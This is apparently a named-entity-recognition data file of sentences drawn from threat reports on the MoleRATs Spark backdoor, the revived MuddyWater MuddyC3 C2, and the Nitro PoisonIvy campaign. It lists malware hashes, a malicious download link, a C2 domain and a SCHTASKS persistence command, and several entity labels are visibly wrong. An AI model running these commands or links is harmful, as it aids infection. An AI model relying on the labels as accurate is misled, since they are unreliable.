{"text": "This campaign is named after a rare backdoor used by the MoleRATs Group , dubbed Spark by Cybereason and previously reported by 360 \u2019s blog .", "spans": [{"start": 57, "end": 65, "label": "Organization"}, {"start": 81, "end": 86, "label": "Malware"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 128, "end": 131, "label": "Organization"}]}
{"text": "The creators of the Spark backdoor use several techniques to evade detection and stay under the radar .", "spans": [{"start": 20, "end": 34, "label": "Malware"}]}
{"text": "They pack the malware with a powerful commercial tool called Enigma Packer and implement language checks to ensure the victims are Arabic speaking .", "spans": [{"start": 61, "end": 74, "label": "System"}]}
{"text": "This minimizes the risk of detection and infection of unwanted victims .", "spans": []}
{"text": "Cyber Espionage in the Middle East : The Cybereason Nocturnus team has discovered several recent , targeted attacks in the Middle East .", "spans": [{"start": 41, "end": 61, "label": "Organization"}, {"start": 123, "end": 134, "label": "System"}]}
{"text": "These attacks deliver the Spark and Pierogi backdoors for politically-driven cyber espionage operations .", "spans": [{"start": 26, "end": 31, "label": "Malware"}, {"start": 36, "end": 53, "label": "Malware"}]}
{"text": "Targeting Palestinians : The campaigns seems to target Palestinian individuals and entities , likely related to the Palestinian government .", "spans": []}
{"text": "Politically-motivated APT : Cybereason suspects that the objective of the threat actor is to obtain sensitive information from the victims and leverage it for political purposes .", "spans": [{"start": 28, "end": 38, "label": "Organization"}]}
{"text": "Lured Into Deploying a Backdoor : The attackers use specially crafted lure content to trick targets into opening malicious files that infect the victim \u2019s machine with a backdoor .", "spans": []}
{"text": "The lure content in the malicious files relates to political affairs in the Middle East , with specific references to the Israeli-Palestinian conflict , tension between Hamas and Fatah , and other political entities in the region .", "spans": [{"start": 169, "end": 174, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}]}
{"text": "Perpetrated by an Arabic-Speaking APT Group : The modus-operandi of the attackers in conjunction with the social engineering tactics and decoy content seem aligned with previous attacks carried out by the Arabic-speaking APT group MoleRATs ( aka Gaza Cybergang ) .", "spans": [{"start": 231, "end": 239, "label": "Organization"}, {"start": 246, "end": 260, "label": "Organization"}]}
{"text": "This group has been operating in the Middle East since 2012 .", "spans": []}
{"text": "These attacks show significant similarities to previously documented attacks attributed to the Arabic-speaking threat actor , commonly referred to as the MoleRATs group ( aka , The Gaza Cybergang , Moonlight , DustySky , Gaza Hacker Team ) .", "spans": [{"start": 154, "end": 162, "label": "Organization"}, {"start": 181, "end": 195, "label": "Organization"}, {"start": 198, "end": 207, "label": "Organization"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 221, "end": 237, "label": "Organization"}]}
{"text": "This group , which has been attributed by various security teams , is believed to be comprised of three subgroups :", "spans": []}
{"text": "Gaza Cybergang Group 1 , also dubbed MoleRATs : MoleRATs has been active since at least 2012 .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 48, "end": 56, "label": "Organization"}]}
{"text": "This Arabic-speaking group uses spear phishing attacks to infect target machines in the Middle East and North Africa with various Remote Access Trojans ( RATs ) .", "spans": [{"start": 130, "end": 151, "label": "System"}, {"start": 154, "end": 158, "label": "System"}]}
{"text": "As MoleRATs most prominently targets Palestinian territories , its spear phishing attacks often use attached malicious documents on topical Palestinian Authority-related issues to lure their victims .", "spans": [{"start": 3, "end": 11, "label": "Organization"}]}
{"text": "The group uses a mix of tools and malware , some developed by the group and others that are more generic tools .", "spans": []}
{"text": "Gaza Cybergang Group 2 , also dubbed Desert Falcons , APT-C-23 , Arid Viper .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 37, "end": 51, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 65, "end": 75, "label": "Organization"}]}
{"text": "This second group is an Arabic-speaking group that mainly targets the Middle East and North Africa , with a few targets in European and Asian countries as well .", "spans": []}
{"text": "The group is known for their advanced attacks that leverage custom-built Windows malware ( Kasperagent , Micropsia ) as well as Android malware ( Vamp , GnatSpy ) .", "spans": [{"start": 73, "end": 80, "label": "System"}, {"start": 91, "end": 102, "label": "Malware"}, {"start": 105, "end": 114, "label": "Malware"}, {"start": 128, "end": 135, "label": "System"}, {"start": 146, "end": 150, "label": "Malware"}, {"start": 153, "end": 160, "label": "Malware"}]}
{"text": "Gaza Cybergang Group 3: This group is believed to be behind Operation Parliament .", "spans": [{"start": 0, "end": 14, "label": "Organization"}]}
{"text": "It is considered to be the most advanced group of the three , and is focused on high-profile targets in the Middle East , North America , Europe and Asia .", "spans": []}
{"text": "The group is reported to have previously attacked government institutions , parliaments , senates , diplomatic functions , and even Olympic and other sports bodies .", "spans": []}
{"text": "It is important to remember there are many threat actors operating in the Middle East , and often there are overlaps in TTPs , tools , motivation , and victimology .", "spans": []}
{"text": "There have been cases in the past where a threat actor attempted to mimic another to thwart attribution efforts , and as such , attribution should rarely be taken as is , but instead with a grain of salt and critical thinking .", "spans": []}
{"text": "In this attack , the targets are lured to open a document or a link attached to an email .", "spans": [{"start": 83, "end": 88, "label": "System"}]}
{"text": "There have been cases in the past where victims also downloaded malicious content from fake news websites .", "spans": []}
{"text": "The names of the files and their content play a major part in luring victims to open them , as they usually relate to current topics pertaining to Hamas , the Palestinian National Authority , or other recent events in the Middle East .", "spans": [{"start": 147, "end": 152, "label": "Organization"}]}
{"text": "The lure documents analyzed by Cybereason in this attack concentrate on the following themes :", "spans": [{"start": 31, "end": 41, "label": "Organization"}]}
{"text": "The Conflict between Hamas and Fatah : The historical rivalry between the Hamas and Fatah has resulted in many open battles between the two entities .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 31, "end": 36, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 84, "end": 89, "label": "Organization"}]}
{"text": "Since 2006 , Hamas has controlled the Gaza strip and Fatah has controlled the West Bank .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 38, "end": 42, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}]}
{"text": "Matters pertaining to the Israeli-Palestinian Conflict : Some of the documents in this campaign reference different aspects of the Israeli-Palestinian conflict , and the efforts for ceasefire and peace processes between the Israelis and the Palestinians , including the latest peace plan made by President Donald Trump and Senior Advisor to the President of the United States Jared Kushner .", "spans": []}
{"text": "Vigilance Following Soleimani \u2019s Assassination : One of the lure documents mentions sources in Lebanon that report a state of alert and vigilance amongst Iranian , Syrian , and Lebasense militias following Soleimani \u2019s assassination .", "spans": []}
{"text": "Tensions Between Hamas and the Egyptian Government : Egypt plays a major role as a mediator in the Israeli-Palestinian confict and has brokered several ceasefire deals and other negotiations in the past .", "spans": [{"start": 17, "end": 22, "label": "Organization"}]}
{"text": "Changes to Egypt \u2019s internal political climate are known to have affected Egyptian government relations with Hamas over the years .", "spans": [{"start": 109, "end": 114, "label": "Organization"}]}
{"text": "It was recently reported that Ismail Haniyeh , the head of Hamas \u2019 political Bureau , had a falling-out with the Egyptian government over his visit to Tehran to participate in General Qasem Soleimani \u2019s funeral , following Soleimani \u2019s assassination .", "spans": [{"start": 59, "end": 64, "label": "Organization"}]}
{"text": "In the Spark campaign , the lure documents and links point to one of two file sharing websites , Egnyte or Dropbox .", "spans": [{"start": 7, "end": 12, "label": "Malware"}, {"start": 97, "end": 103, "label": "System"}, {"start": 107, "end": 114, "label": "System"}]}
{"text": "The target is encouraged to download an archive file in a rar or zip format that contains an executable file masquerading as a Microsoft Word document .", "spans": [{"start": 58, "end": 61, "label": "System"}, {"start": 65, "end": 68, "label": "System"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 137, "end": 141, "label": "System"}]}
{"text": "One example of a lure document used in the Spark campaign is a PDF file that is used to deliver the Spark backdoor to the victim .", "spans": [{"start": 43, "end": 48, "label": "Malware"}, {"start": 63, "end": 66, "label": "System"}, {"start": 100, "end": 114, "label": "Malware"}]}
{"text": "The document includes a special report allegedly quoted from the Egyptian newspaper Al-Ahram .", "spans": [{"start": 84, "end": 92, "label": "Organization"}]}
{"text": "This document reports that Ismail Hanieyh , the political leader of Hamas , had notified the Egyptian government that he will remain abroad after his visit to Tehran to take part in Soleimani \u2019s funeral , which sparked tension with the Egyptian authorities .", "spans": []}
{"text": "Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf : 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e .", "spans": [{"start": 0, "end": 54, "label": "Indicator"}, {"start": 57, "end": 121, "label": "Indicator"}]}
{"text": "The target is encouraged to click on the link to read the entire article .", "spans": []}
{"text": "However , the document does not link to the Egyptian Newspaper website , but instead to a file sharing website called Egnyte .", "spans": [{"start": 118, "end": 124, "label": "System"}]}
{"text": "It prompts the user to download a file that supposedly contains the full article .", "spans": []}
{"text": "Link embedded in the PDF document : https://csaasd.egnyte.com/dd/h5s7YHzOy5 .", "spans": [{"start": 21, "end": 24, "label": "System"}, {"start": 36, "end": 75, "label": "Indicator"}]}
{"text": "The downloaded file is an archive file ( .r23 ) , that contains a Windows executable file with the same name as the PDF and with a fake Microsoft Word icon .", "spans": [{"start": 41, "end": 45, "label": "Indicator"}, {"start": 66, "end": 73, "label": "System"}, {"start": 116, "end": 119, "label": "System"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 146, "end": 150, "label": "System"}]}
{"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23 :", "spans": [{"start": 0, "end": 56, "label": "Indicator"}]}
{"text": "e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe :", "spans": [{"start": 0, "end": 56, "label": "Indicator"}]}
{"text": "7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "When the victim double clicks on the executable file , it unpacks and installs the Spark backdoor , as shown in the attack tree screenshot below .", "spans": [{"start": 83, "end": 97, "label": "Malware"}]}
{"text": "The extracted executable file contains a compiled Autoit script , which can be seen in the RT_RCDATA section of the file .", "spans": [{"start": 50, "end": 56, "label": "System"}]}
{"text": "The decompiled code shows the decryption routine that unpacks the embedded Spark backdoor .", "spans": [{"start": 75, "end": 89, "label": "Malware"}]}
{"text": "Once the file is unpacked , the backdoor is dropped in two different locations on the infected operating system :", "spans": []}
{"text": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\runawy.exe .", "spans": [{"start": 0, "end": 86, "label": "Indicator"}]}
{"text": "C:\\Users\\user\\runawy.exe .", "spans": [{"start": 0, "end": 24, "label": "Indicator"}]}
{"text": "In addition , the Autoit code also creates the following scheduled task for persistence :", "spans": []}
{"text": "SCHTASKS /Create /f /SC minute /TN runawy /mo 5 /tr C:\\Users\\<USER>\\runawy.exe .", "spans": [{"start": 52, "end": 78, "label": "Indicator"}]}
{"text": "Urgent_Information_Report.exe :", "spans": [{"start": 0, "end": 29, "label": "Indicator"}]}
{"text": "6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "The executable has a Microsoft Word icon to trick victims into believing they are opening a Word document .", "spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 31, "end": 35, "label": "System"}, {"start": 92, "end": 96, "label": "System"}]}
{"text": "Once the user double-clicks on the executable file , the dropper drops a Word document in %AppData% and displays the following decoy document to the victim , while the dropper runs in the background and installs the backdoor . %appdata%\\info.docx :", "spans": [{"start": 73, "end": 77, "label": "System"}, {"start": 227, "end": 246, "label": "Indicator"}]}
{"text": "2c50eedc260c82dc176447aa4116ad37112864f4e1e3e95c4817499d9f18a90d .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "The dropper drops the Spark backdoor binary and a shortcut file used to initiate persistence in the following locations .", "spans": [{"start": 22, "end": 36, "label": "Malware"}]}
{"text": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Blaster.lnk :", "spans": [{"start": 0, "end": 87, "label": "Indicator"}]}
{"text": "4254dc8c368cbc36c8a11035dcd0f4b05d587807fa9194d58f0ba411bfd65842 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "C:\\Users\\user\\AppData\\Roaming\\Blaster.exe :", "spans": [{"start": 0, "end": 41, "label": "Indicator"}]}
{"text": "cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551 .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "The Spark payload is a custom backdoor likely developed by the MoleRATs group .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 63, "end": 71, "label": "Organization"}]}
{"text": "In addition to known generic malware ( such as : njRAT , Poison Ivy , XtremeRAT ) , the MoleRATs group has been known to develop its own custom tools such as DustySky , the MoleRAT Loader and Scote .", "spans": [{"start": 49, "end": 54, "label": "Malware"}, {"start": 57, "end": 67, "label": "Malware"}, {"start": 70, "end": 79, "label": "Malware"}, {"start": 88, "end": 96, "label": "Organization"}, {"start": 158, "end": 166, "label": "Malware"}, {"start": 173, "end": 180, "label": "Malware"}, {"start": 192, "end": 197, "label": "Malware"}]}
{"text": "We believe this backdoor is relatively new and seems to have appeared starting in the beginning of 2019 .", "spans": []}
{"text": "The name Spark is derived from the PDB path left in a few of the backdoor binaries :", "spans": [{"start": 9, "end": 14, "label": "Malware"}, {"start": 35, "end": 38, "label": "System"}]}
{"text": "W:\\Visual Studio 2017\\Spark4.2\\Release\\Spark4.2.pdb .", "spans": [{"start": 0, "end": 51, "label": "Indicator"}]}
{"text": "The Spark backdoor allows the attackers to :", "spans": [{"start": 4, "end": 18, "label": "Malware"}]}
{"text": "Collect information about the infected machine .", "spans": []}
{"text": "Encrypt the collected data and send it to the attackers over the HTTP protocol .", "spans": [{"start": 65, "end": 69, "label": "Indicator"}]}
{"text": "Download additional payloads .", "spans": []}
{"text": "Log keystrokes .", "spans": []}
{"text": "Record audio using the computer \u2019s microphone .", "spans": []}
{"text": "Execute commands on the infected machine .", "spans": []}
{"text": "The creators of the Spark backdoor use a few techniques that are intended to keep the backdoor under-the-radar , including :", "spans": [{"start": 20, "end": 34, "label": "Malware"}]}
{"text": "Packing the payloads with the Enigma packer .", "spans": [{"start": 30, "end": 36, "label": "System"}]}
{"text": "Checking for antivirus and other security products using WMI .", "spans": [{"start": 57, "end": 60, "label": "System"}]}
{"text": "Validating Arabic keyboard and language settings on the infected machine .", "spans": []}
{"text": "All the the payloads observed by Cybereason in this campaign were packed by a powerful yet commercial packer called Enigma Packer .", "spans": [{"start": 33, "end": 43, "label": "Organization"}, {"start": 116, "end": 122, "label": "System"}]}
{"text": "The MoleRATs group have been known to use this packer in previous attacks .", "spans": [{"start": 4, "end": 12, "label": "Organization"}]}
{"text": "Enigma packer artifacts in file metadata ( SHA-256: b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca ) .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 52, "end": 116, "label": "Indicator"}]}
{"text": "One common evasive mechanism used by the Spark backdoor is its ability to check for installed security products using WMI queries ( WQL ) .", "spans": [{"start": 41, "end": 55, "label": "Malware"}, {"start": 118, "end": 121, "label": "System"}]}
{"text": "If certain security products are installed , the backdoor does not carry out its malicious activity .", "spans": []}
{"text": "Another evasive mechanism used by the backdoor is how it checks whether an Arabic keyboard and Arabic language settings are used on the infected machine .", "spans": []}
{"text": "If Arabic keyboard and language settings are not found on the machine , the backdoor will not carry out its malicious activity .", "spans": []}
{"text": "This check serves two purposes :", "spans": []}
{"text": "It minimizes the risk of overexposure by specifically targeting Arabic speakers .", "spans": []}
{"text": "It can thwart detection by automated analysis engines and sandbox solutions .", "spans": []}
{"text": "After unpacking itself , the Spark backdoor creates a hidden window where most of the malicious activity is handled .", "spans": [{"start": 29, "end": 43, "label": "Malware"}, {"start": 61, "end": 67, "label": "System"}]}
{"text": "This behavior can be detected using a tool called WinLister , which enumerates hidden windows .", "spans": [{"start": 50, "end": 59, "label": "System"}, {"start": 86, "end": 93, "label": "System"}]}
{"text": "The name of the window is Spark4.2 .", "spans": [{"start": 26, "end": 34, "label": "Malware"}]}
{"text": "The Spark backdoor communicates with the C2 servers over the HTTP protocol .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 41, "end": 43, "label": "System"}, {"start": 61, "end": 65, "label": "Indicator"}]}
{"text": "The data is first encrypted and then encoded with Base64 .", "spans": []}
{"text": "In this instance , the backdoor posts the data to the domain Nysura.com ( For more domains , please see the IOC section of this research ) .", "spans": [{"start": 61, "end": 71, "label": "Indicator"}]}
{"text": "It is interesting to see that the HTTP POST host header refers to a legitimate domain cnet.com , however , in acutality , the data is sent to nysura.com , as can be seen in the traffic screenshot below .", "spans": [{"start": 34, "end": 38, "label": "Indicator"}, {"start": 86, "end": 94, "label": "Indicator"}, {"start": 142, "end": 152, "label": "Indicator"}]}
{"text": "The data sent to the C2 follows a structured pattern that uses a predefined keywords array , where each keyword is mapped to a certain subroutine .", "spans": [{"start": 21, "end": 23, "label": "System"}]}
{"text": "The keywords are comprised of the names of individuals .", "spans": []}
{"text": "They are mostly Western names , but there were some Arabic names in a few of the samples .", "spans": []}
{"text": "Prior to sending the data to the server , the data is encrypted and staged in an array like this :", "spans": []}
{"text": "[27089,28618,9833,4170,25722,19977,2369,21426,3435,7442,30146,21719,16140,16280,16688,22550,19867,194,3298] .", "spans": []}
{"text": "The data is then encoded with Base64 :", "spans": []}
{"text": "\" WzI3MDg5LDI4NjE4LDk4MzMsNDE3MCwyNTcyMiwxOTk3NywyMzY5LDIxNDI2LDM0MzUsNzQ0MiwzMDE0NiwyMTcxOSwxNjE0MCwxNjI4MCwxNjY4OCwyMjU1MCwxOTg2NywxOTQsMzI5OF0= \" .", "spans": []}
{"text": "The Base64-encoded data is inserted into the following json object , which contains the individual names .", "spans": []}
{"text": "Lastly , the entire json object is encoded with Base64 and undergoes another stage of encryption , and then sent to the server :", "spans": []}
{"text": "\" ZjRTc1dTTU9nVW5FaXM3bGgvbU90MTlVMHFkb1c5SFFuRXhhSVR5YytIQkZremk3bk5wY21BUEZRYitJenA1cnlJY1lxREJJZ1RrL0N4UzZWcVVQM0pTUWFISlhKWG8wN1BxWE1hYThHSUdEVnBFakYrNlp1bXBvdUZMRFNYQVhxYk9tSElWYTFOTlpJK0hFVVBmTG9CQUV3VCtqQ2FCVUE1aHQ2SzllSHREMUpOdkdBUXZ3TWgyLzhtVHpha2I0TE81ZlpURTQyUmVjdFY1M0ZpemlRR1FLL1gzNE9mcU0zR0JqQ1ZnN1hCSmFGaC94RHBDMkNBRmZaSTVoVlhsaTBtQW5SR3N5QzVRY2lMNkpZVFJuRTQrUzBjdjU4SjY4ejRCL2FNbW9IakRheHdQd1RPUElkOHNDbDRVbmp2ZDM0ZVZlZTB1QVA0UHo0YllyVHRMZVRnPT0= \" .", "spans": []}
{"text": "Using names as keywords is an identical technique to that of the data structure logic previously documented by 360 \u2019s blog post .", "spans": [{"start": 111, "end": 114, "label": "Organization"}]}
{"text": "This post discusses an earlier variant of the backdoor attributed to the MoleRATs group .", "spans": [{"start": 73, "end": 81, "label": "Organization"}]}
{"text": "Using other individuals names for C2 communication has also been done by the two other Gaza Cybergang groups :", "spans": [{"start": 34, "end": 36, "label": "System"}]}
{"text": "Gaza Cybergang Group 2 with the Micropsia backdoor :", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 32, "end": 50, "label": "Malware"}]}
{"text": "In this instance , the C2 communication implemented by the Micropsia backdoor also used specific names for different C2 commands .", "spans": [{"start": 23, "end": 25, "label": "System"}, {"start": 59, "end": 77, "label": "Malware"}, {"start": 117, "end": 119, "label": "System"}]}
{"text": "Gaza Cybergang Group 3 in Operation Parliament : In this instance , the malware also used people \u2019s names for C2 communication to send and receive commands from the server .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 110, "end": 112, "label": "System"}]}
{"text": "Based on the similarity of the naming convention and data format , we believe the Spark backdoor could be an evolution of the backdoor mentioned in Operation Parliament , or at least inspired by the malware .", "spans": [{"start": 82, "end": 96, "label": "Malware"}]}
{"text": "The Spark campaign detailed in this blog demonstrates how the tense geopolitical climate in the Middle East is used by threat actors to lure victims and infect them with the Spark backdoor for cyber espionage purposes .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 174, "end": 188, "label": "Malware"}]}
{"text": "The names of the files and decoy content seem to be carefully crafted , often referencing controversial and topical political issues .", "spans": []}
{"text": "Cybereason estimates that the files are specifically meant to lure and appeal to victims from the Middle East , especially towards individuals and entities in the Palestinian territories likely related to the Palestinian government or the Fatah movement .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 98, "end": 109, "label": "Malware"}]}
{"text": "The techniques , tools , and procedures used in this campaign bear great resemblance to previous attacks attributed to the MoleRATs Group ( aka Gaza Cybergang Group ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": [{"start": 123, "end": 131, "label": "Organization"}, {"start": 144, "end": 158, "label": "Organization"}]}
{"text": "Our research demonstrates the efforts used by attackers to reduce the risk of detection of the Spark backdoor by various security products .", "spans": [{"start": 95, "end": 109, "label": "Malware"}]}
{"text": "The backdoor checks for the existence of antivirus and firewall products before it initiates its malicious activity .", "spans": []}
{"text": "Importantly , the backdoor simply will not reveal its malicious nature unless Arabic language keyboard and settings are found on the infected machine .", "spans": []}
{"text": "This shows how the attackers use this backdoor in a surgical way to exclusively attack specific targets .", "spans": []}
{"text": "In addition , analysis of these backdoor delivery methods also highlights a trend by many threat actors where they use legitimate storage platforms to deliver the initial stages of the attack .", "spans": []}
{"text": "Reviving MuddyC3 Used by MuddyWater ( IRAN ) APT .", "spans": [{"start": 9, "end": 16, "label": "System"}, {"start": 25, "end": 35, "label": "Organization"}, {"start": 38, "end": 42, "label": "Organization"}]}
{"text": "MuddyWater is a well-known threat actor group founded by Iran . \u201c that has been active since 2017 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}]}
{"text": "They target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments .", "spans": [{"start": 88, "end": 94, "label": "System"}]}
{"text": "Most recently they were connected to a campaign in March that targeted \u201d organizations in Turkey , Pakistan , and Tajikistan .", "spans": []}
{"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \u201c POWERSTATS \u201d .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 69, "end": 85, "label": "System"}, {"start": 117, "end": 127, "label": "Malware"}]}
{"text": "Despite broad scrutiny and reports on MuddyWater attacks , the activity continues with only incremental changes to the tools and techniques .", "spans": [{"start": 38, "end": 48, "label": "Organization"}]}
{"text": "In June 26 2019 a group called \u201c Green Leakers \u201d on telegram published screenshots of the C2 admin panel as you can see below along with screenshot of the muddyc3 c2 source code . they announced that they are selling all the leaked tools for 0.5BTC .", "spans": [{"start": 33, "end": 46, "label": "Organization"}, {"start": 90, "end": 92, "label": "System"}, {"start": 155, "end": 162, "label": "System"}, {"start": 163, "end": 165, "label": "System"}]}
{"text": "At that time i got the source code from github , so i tried the code to find that the core of the c2 which is powershell payload is messing ( the leaker didn\u2019t include the payload in order to by all the tools ) . so i didn\u2019t have time to reverse engineer the source code and i left it . last week i got 3 days off from my work ( working in SOC will keep you for ever busy ) so i started analyzing the code which will be discussed below and i was able to understand how it works in order to create the messing powershell payload and make the c2 come to life .", "spans": [{"start": 40, "end": 46, "label": "System"}, {"start": 98, "end": 100, "label": "System"}, {"start": 110, "end": 120, "label": "System"}, {"start": 340, "end": 343, "label": "System"}, {"start": 509, "end": 519, "label": "System"}, {"start": 541, "end": 543, "label": "System"}]}
{"text": "I didn\u2019t just revive the C2 but also added more advanced functionality which will be released as separate tool soon .", "spans": [{"start": 25, "end": 27, "label": "System"}]}
{"text": "Lets start by giving a summary about the muddyc3 tool :", "spans": [{"start": 41, "end": 48, "label": "System"}]}
{"text": "Coded with python2.7 . works as C2 server that serve a powershell agent script when requested . i didn\u2019t find any function to encrypt the traffic between the the agent and the C2 but there are variables with name private_key , public_key so i suspect the functions removed . its make use of HTA and bas64 encoded powershell code to bypass the AV ( right now AV can catch HTA ) .", "spans": [{"start": 11, "end": 20, "label": "System"}, {"start": 32, "end": 34, "label": "System"}, {"start": 55, "end": 65, "label": "System"}, {"start": 176, "end": 178, "label": "System"}, {"start": 291, "end": 294, "label": "System"}, {"start": 313, "end": 323, "label": "System"}, {"start": 343, "end": 345, "label": "System"}, {"start": 358, "end": 360, "label": "System"}, {"start": 371, "end": 374, "label": "System"}]}
{"text": "It use threading so many agent can connect and controlled at the same time . the agent must collect information about the system when it first start then report it to the C2 . there is template for agent which will be filled with ip and port when the C2 run . include functions but not all implemented in the initial POC :", "spans": [{"start": 171, "end": 173, "label": "System"}, {"start": 251, "end": 253, "label": "System"}, {"start": 317, "end": 320, "label": "System"}]}
{"text": "upload , download , load modules , get screenshot .", "spans": []}
{"text": "The initial powershell agent POC i created can bypass the AV including Kaspersky , Trendmicro .", "spans": [{"start": 12, "end": 22, "label": "System"}, {"start": 29, "end": 32, "label": "System"}, {"start": 58, "end": 60, "label": "System"}, {"start": 71, "end": 80, "label": "System"}, {"start": 83, "end": 93, "label": "System"}]}
{"text": "Now we dig deep in the C2 to explain how it work and how i created the agent based on the function available in the C2 .", "spans": [{"start": 23, "end": 25, "label": "System"}, {"start": 116, "end": 118, "label": "System"}]}
{"text": "C2 interface", "spans": [{"start": 0, "end": 2, "label": "System"}]}
{"text": ":", "spans": []}
{"text": "simple CLI interface that ask when started for IP ,Port and proxy configuration to generate the initial payloads .", "spans": [{"start": 7, "end": 10, "label": "System"}]}
{"text": "The Nitro Attacks .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "This document discusses a recent targeted attack campaign directed primarily at private companies involved in the research , development , and manufacture of chemicals and advanced materials .", "spans": []}
{"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": []}
{"text": "In addition , the same attackers appear to have a lengthy operation history including attacks on other industries and organizations .", "spans": []}
{"text": "Attacks on the chemical industry are merely their latest attack wave .", "spans": []}
{"text": "As part of our investigations , we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks .", "spans": []}
{"text": "As the pattern of chemical industry targets emerged , we internally code-named the attack campaign Nitro .", "spans": [{"start": 99, "end": 104, "label": "Organization"}]}
{"text": "The attack wave started in late July 2011 and continued into midSeptember 2011 .", "spans": []}
{"text": "However , artifacts of the attack wave such as Command and Control ( C&C ) servers are also used as early as April 2011 and against targets outside the chemical industry .", "spans": [{"start": 47, "end": 66, "label": "System"}, {"start": 69, "end": 72, "label": "System"}]}
{"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": []}
{"text": "The attackers first researched desired targets and then sent an email specifically to the target .", "spans": [{"start": 64, "end": 69, "label": "System"}]}
{"text": "Each organization typically only saw a handful of employees at the receiving end of these emails .", "spans": [{"start": 90, "end": 96, "label": "System"}]}
{"text": "However , in one organization almost 500 recipients received a mail , while in two other organizations , more than 100 were selected .", "spans": []}
{"text": "While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": [{"start": 73, "end": 79, "label": "System"}]}
{"text": "First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners .", "spans": []}
{"text": "Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": [{"start": 20, "end": 26, "label": "System"}]}
{"text": "The emails then contained an attachment that was either an executable that appeared to be a text file based on the file name and icon , or a password-protected archive containing an executable file with the password provided in the email .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 232, "end": 237, "label": "System"}]}
{"text": "In both cases , the executable file was a self-extracting executable containing PoisonIvy , a common backdoor Trojan developed by a Chinese speaker .", "spans": [{"start": 80, "end": 89, "label": "Malware"}, {"start": 110, "end": 116, "label": "Malware"}]}
{"text": "When the recipient attempted to open the attachment , they would inadvertently execute the file , causing PoisonIvy to be installed .", "spans": [{"start": 106, "end": 115, "label": "Malware"}]}
{"text": "Once PoisonIvy was installed , it contacted a C&C server on TCP port 80 using an encrypted communication protocol .", "spans": [{"start": 5, "end": 14, "label": "Malware"}, {"start": 46, "end": 49, "label": "System"}, {"start": 60, "end": 63, "label": "Indicator"}]}
{"text": "Using the C&C server , the attackers then instructed the compromised computer to provide the infected computer \u2019s IP address , the names of all other computers in the workgroup or domain , and dumps of Windows cached password hashes .", "spans": [{"start": 10, "end": 13, "label": "System"}, {"start": 202, "end": 209, "label": "System"}]}
{"text": "By using access to additional computers through the currently logged on user or cracked passwords through dumped hashes , the attackers then began traversing the network infecting additional computers .", "spans": []}
{"text": "Typically , their primary goal is to obtain domain administrator credentials and/or gain access to a system storing intellectual property .", "spans": []}
{"text": "Domain administrator credentials make it easier for the attacker to find servers hosting the desired intellectual property and gain access to the sensitive materials .", "spans": []}
{"text": "The attackers may have also downloaded and installed additional tools to penetrate the network further .", "spans": []}
{"text": "While the behavior of the attackers differs slightly in each compromise , generally once the attackers have identified the desired intellectual property , they copy the content to archives on internal systems they use as internal staging servers .", "spans": []}
{"text": "This content is then uploaded to a remote site outside of the compromised organization completing the attack .", "spans": []}
{"text": "The majority of infected machines are located in the US , Bangladesh and the UK ;", "spans": []}
{"text": "however , overall there is wide geographical spread of infections .", "spans": []}
{"text": "As mentioned above , the threat used to compromise the targeted networks is Poison Ivy , a Remote Access Tool ( RAT ) .", "spans": [{"start": 76, "end": 86, "label": "Malware"}]}
